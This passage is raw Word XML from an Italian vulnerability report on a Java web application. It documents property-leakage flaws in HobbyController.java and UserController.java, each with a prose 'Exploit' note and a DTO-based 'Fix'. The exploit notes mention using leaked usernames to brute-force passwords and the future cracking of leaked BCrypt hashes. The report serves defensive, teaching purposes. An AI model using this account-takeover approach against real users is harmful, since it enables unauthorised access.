        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HobbyController</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2131E" w14:textId="30E8E5B5" w:rsidR="000F4F60" w:rsidRPr="000F4F60" w:rsidRDefault="000F4F60" w:rsidP="000F4F60">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8DBA01" w14:textId="375E7776" w:rsidR="000F4F60" w:rsidRDefault="000F4F60" w:rsidP="00CE3F28">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La vulnerabilità risulta vera perché vengono mandati in rete delle informazioni non necessarie riguardo gli Hobby come </w:t>
      </w:r>
      <w:r>
        <w:t>category, creator e location</w:t>
      </w:r>
      <w:r w:rsidR="00A83B5D">
        <w:t xml:space="preserve">, come visibile in Figura 14. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1FB7D0" w14:textId="7F39524E" w:rsidR="00A83B5D" w:rsidRPr="00A83B5D" w:rsidRDefault="00A83B5D" w:rsidP="00CE3F28">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83B5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01828959" w14:textId="4AFF2F38" w:rsidR="00A83B5D" w:rsidRDefault="00A83B5D" w:rsidP="006F4082">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo caso l’exploit consiste nel leggere i campi non necessari e usarli per altri possibili attacchi. Ad esempio il nome del creatore, che coincide con il suo username, può essere utilizzato per rubare il suo account, facendo un attacco brute force sulla password.</w:t>
      </w:r>
      <w:r w:rsidR="006F4082">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F4082">
        <w:t>I campi superflui sono visibili dal Web developer tool di un browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C20EA08" w14:textId="725DB52D" w:rsidR="00A83B5D" w:rsidRPr="00A83B5D" w:rsidRDefault="00A83B5D" w:rsidP="00CE3F28">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83B5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDBBF4" w14:textId="61C1E8C9" w:rsidR="003A418E" w:rsidRDefault="00A83B5D" w:rsidP="00A83B5D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per risolvere tale problema, in </w:t>
      </w:r>
      <w:r w:rsidR="004514D2" w:rsidRPr="00A83B5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HobbyController</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83B5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
      <w:r w:rsidR="004514D2">
        <w:t xml:space="preserve"> è stato modificato il metodo </w:t>
      </w:r>
      <w:r w:rsidR="004514D2" w:rsidRPr="00A83B5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getHobbyDetails()</w:t>
      </w:r>
      <w:r w:rsidR="004514D2">
        <w:t xml:space="preserve"> in modo tale da non restituire i campi dell’oggetto Hobby che non vengono utilizzati. Per fare ciò è stata introdotta la classe HobbyResponseDTO che è depurata dai campi inutilizzati</w:t>
      </w:r>
      <w:r>
        <w:t>, come mostrato in Figura 15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED62CB1" w14:textId="227DB153" w:rsidR="003A418E" w:rsidRDefault="00A83B5D" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="105F3BA9" wp14:editId="4B087F8A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>762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08112798" w14:textId="15838138" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075A4DBA" w14:textId="044BED03" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F8DE8E" w14:textId="372B69EB" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560260BD" w14:textId="79500E8B" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D774663" w14:textId="15178833" w:rsidR="00093E39" w:rsidRDefault="00A83B5D" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251778048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A239514" wp14:editId="5C4EC473">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>589915</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7247890" cy="251460"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="183408239" name="Casella di testo 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7247890" cy="251460"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="2DD5C29B" w14:textId="3DDDF9CD"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4</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Hobby con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9514" id="_x0000_s1041" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:46.45pt;width:570.7pt;height:19.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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2DD5C29B" w14:textId="3DDDF9CD" w:rsidR="00A83B5D" w:rsidRPr="00431D51"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4</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Hobby con campi non necessari</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E42BA3B" w14:textId="6AB1804A" w:rsidR="00093E39" w:rsidRDefault="00A83B5D" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251780096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="369379B7" wp14:editId="6812B903">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-454660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1118870</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7025005" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="522098944" name="Casella di testo 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7025005" cy="635"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5E89BB1C" w14:textId="509C21CD"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5</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Hobby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79B7" id="_x0000_s1042" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-35.8pt;margin-top:88.1pt;width:55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sGwIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU01v2zAMvQ/YfxB0X+xkSD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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5E89BB1C" w14:textId="509C21CD" w:rsidR="00A83B5D" w:rsidRPr="002D15F4"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5</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Hobby senza i campi inutili</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5EF57185" wp14:editId="7197DA3D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-56896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3761B5AE" w14:textId="48F90C38"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06DD55CE" w14:textId="77777777" w:rsidR="00A83B5D" w:rsidRDefault="00A83B5D" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B18835D" w14:textId="202BAB78" w:rsidR="00A83B5D" w:rsidRDefault="00A83B5D" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251782144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="465DDC3B" wp14:editId="30D1CA22">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1047750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6297930" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="753584494" name="Casella di testo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357CC040" w14:textId="44AF3B47"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6</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Hobby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DDC3B" id="_x0000_s1043" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:82.5pt;width:495.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80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7d3N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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="357CC040" w14:textId="44AF3B47" w:rsidR="00A83B5D" w:rsidRPr="00CA056D"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6</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbyController.java con vulnerabilità</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71375523" wp14:editId="59134F75">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>170815</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6297930" cy="820124"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="351575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820124"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EAE8F4" w14:textId="77834BB9" w:rsidR="00A83B5D" w:rsidRDefault="00A83B5D" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5F0330" w14:textId="1FACC70B" w:rsidR="00A83B5D" w:rsidRDefault="00A83B5D" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D39F0A" w14:textId="1B39C1C6" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB101A1" w14:textId="450BFC70" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FD0101" w14:textId="3C2A967D" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1ECF51" w14:textId="57881359" w:rsidR="003A418E" w:rsidRDefault="00A83B5D" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251784192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A5B2ACE" wp14:editId="2F21584C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>255905</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1092835</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5608320" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="459027905" name="Casella di testo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F4588C9" w14:textId="72F73483"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7</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Hobby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B2ACE" id="_x0000_s1044" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:20.15pt;margin-top:86.05pt;width:441.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QM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fjed3UwpJis3u7mO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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3F4588C9" w14:textId="72F73483" w:rsidR="00A83B5D" w:rsidRPr="002B0D86" w:rsidRDefault="00A83B5D" w:rsidP="00A83B5D">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>17</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbyController.java non vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00FF467B" wp14:editId="7AC6A3BD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>52070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5608320" cy="983780"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapNone/>
            <wp:docPr id="7154234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983780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AD9091" w14:textId="59703718" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02ADE5A1" w14:textId="2668BF7D" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4852D453" w14:textId="77777777" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5037D5C6" w14:textId="77777777" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4DC133" w14:textId="6616D199" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00467BBC"/>
    <w:p w14:paraId="16A73190" w14:textId="2B4DA22D" w:rsidR="00467BBC" w:rsidRPr="00A83B5D" w:rsidRDefault="00467BBC" w:rsidP="00A83B5D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83B5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unexpected property leakage</w:t>
      </w:r>
      <w:r w:rsidR="001A56AB" w:rsidRPr="00A83B5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4268E0A3" w14:textId="7E0B3593" w:rsidR="00A83B5D" w:rsidRDefault="00A83B5D" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00A83B5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>: UserController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32710F09" w14:textId="0CB3F727" w:rsidR="00A83B5D" w:rsidRDefault="00A83B5D" w:rsidP="00A83B5D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00A83B5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>: 84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AC59F2" w14:textId="6ABABD97" w:rsidR="006F4082" w:rsidRDefault="006F4082" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tale vulnerabilità riguarda il metodo </w:t>
      </w:r>
      <w:r w:rsidR="00B04DA2" w:rsidRPr="006F4082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getBusinessDetails()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04DA2">
        <w:t xml:space="preserve">nella classe </w:t>
      </w:r>
      <w:r w:rsidR="00B04DA2" w:rsidRPr="006F4082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserController</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
      <w:r w:rsidR="00B04DA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>invia</w:t>
      </w:r>
      <w:r w:rsidR="00B04DA2">
        <w:t xml:space="preserve"> alla rete informazioni sensibili non necessarie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>In particolare sono stati rimossi i campi id, password, roles e hobby_offers</w:t>
      </w:r>
      <w:r>
        <w:t>, dove il campo password contiene l’hash della password usata (Figura 20).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B690A8F" w14:textId="15F1D013" w:rsidR="006F4082" w:rsidRPr="006F4082" w:rsidRDefault="006F4082" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70565DAE" w14:textId="207F44E2" w:rsidR="006F4082" w:rsidRDefault="006F4082" w:rsidP="006F4082">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’algoritmo di hash utilizzato è BCrypt che è attualmente difficile da attaccare ma in futuro tale algoritmo potrebbe risultare debole grazie all’utilizzo di unità di calcolo sempre più potenti. Inoltre, le informazioni sensibili possono essere usate per fare altri attacchi e sono un problema per la privacy. </w:t>
      </w:r>
      <w:r>
        <w:t>I campi superflui sono visibili dal Web developer tool di un browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E91835" w14:textId="0B76E1F4" w:rsidR="006F4082" w:rsidRPr="006F4082" w:rsidRDefault="006F4082" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E174258" w14:textId="7C9FD10A" w:rsidR="00B04DA2" w:rsidRDefault="00B04DA2" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Per risolvere è stata introdotta una classe DTO dove sono presenti solo gli attributi necessari.</w:t>
      </w:r>
      <w:r w:rsidR="00872EF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF6513">
        <w:t>(Figura 19 e 21).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E52B125" w14:textId="247D9E47" w:rsidR="00B04DA2" w:rsidRDefault="006F4082" w:rsidP="002A0868">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251788288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="022DD45A" wp14:editId="0EE82CFB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>913765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6405880" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="797896674"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345C1A0D" w14:textId="52F81806"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18</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: UserController.java con vulnera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D45A" id="_x0000_s1045" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:71.95pt;width:504.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0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4/jW9nMwpJik0/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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
